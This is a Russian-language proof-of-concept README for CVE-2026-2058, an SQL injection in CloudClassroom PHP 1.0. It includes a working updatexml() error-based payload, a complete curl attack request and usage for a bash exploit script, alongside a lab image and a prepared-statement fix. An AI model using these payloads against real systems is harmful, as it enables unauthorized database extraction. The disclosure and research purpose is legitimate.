
Доказательство концепции эксплуатации для CVE-2026-2058, SQL-инъекции в PHP-проекте CloudClassroom, с автоматизированным перебором базы данных и извлечением данных.
Уязвимость SQL-инъекции существует в функциональности Post Query проекта CloudClassroom PHP Project (v1.0).
Уязвимость позволяет злоумышленникам внедрять произвольные SQL-команды через POST-параметр squeryx, что приводит к перечислению базы данных и извлечению данных.
Этот репозиторий содержит Proof of Concept (PoC) эксплойт, демонстрирующий, как уязвимость может быть использована для извлечения конфиденциальных данных из серверной базы данных.
| Поле | Значение |
|---|
| CVE | CVE-2026-2058 |
| Тип уязвимости | SQL-инъекция |
| CWE | CWE-89 |
| Затронутое ПО | CloudClassroom PHP Project |
| Затронутая версия | 1.0 |
| Компонент | Функциональность Post Query |
| Вектор атаки | Удалённый |
| Требуется аутентификация | Нет |
| Воздействие | Раскрытие базы данных |
| Степень серьёзности | Высокая |
| Ссылка на паттерн атаки | CAPEC-66 |
POST /postquerypublic
squeryx
Серверный код напрямую конкатенирует пользовательский ввод в SQL-запрос без надлежащей санитизации или параметризованных запросов.
Пример уязвимого кода:
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";
Поскольку $tempsquery формируется из пользовательского ввода, злоумышленники могут внедрять произвольный SQL.
Для целей тестирования и исследований доступна уязвимая Docker-среда.
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0
Уязвимость может быть использована с помощью техники error-based SQL-инъекции, применяющей функцию MySQL updatexml().
Пример полезной нагрузки:
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1
Пример curl-запроса:
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"
Ожидаемый ответ:
XPATH syntax error: '~cc_db~'
Этот репозиторий включает bash-эксплойт, который автоматически:
chmod +x cloudclassroom_sqli_exploit.sh
./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic
Пример:
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic
Злоумышленник может:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L⚠️ Примечание: Оценка CVSS от NVD отличается от оценки CNA (VulDB) из-за различных оценок воздействия.
Система прогнозирования вероятности эксплуатации (EPSS) оценивает вероятность того, что уязвимость будет использована в реальных условиях.
| CVE | Вероятность EPSS | Процентиль | Дата |
|---|---|---|---|
| CVE-2026-2058 | 0.00028 | 7.62 % | 2026-03-01 |
Источник: Набор данных FIRST EPSS
Разработчикам следует:
Пример безопасной реализации:
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();


Этот эксплойт предоставлен только в образовательных и исследовательских целях.
Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим кодом.
bl4dsc4n
Исследователь безопасности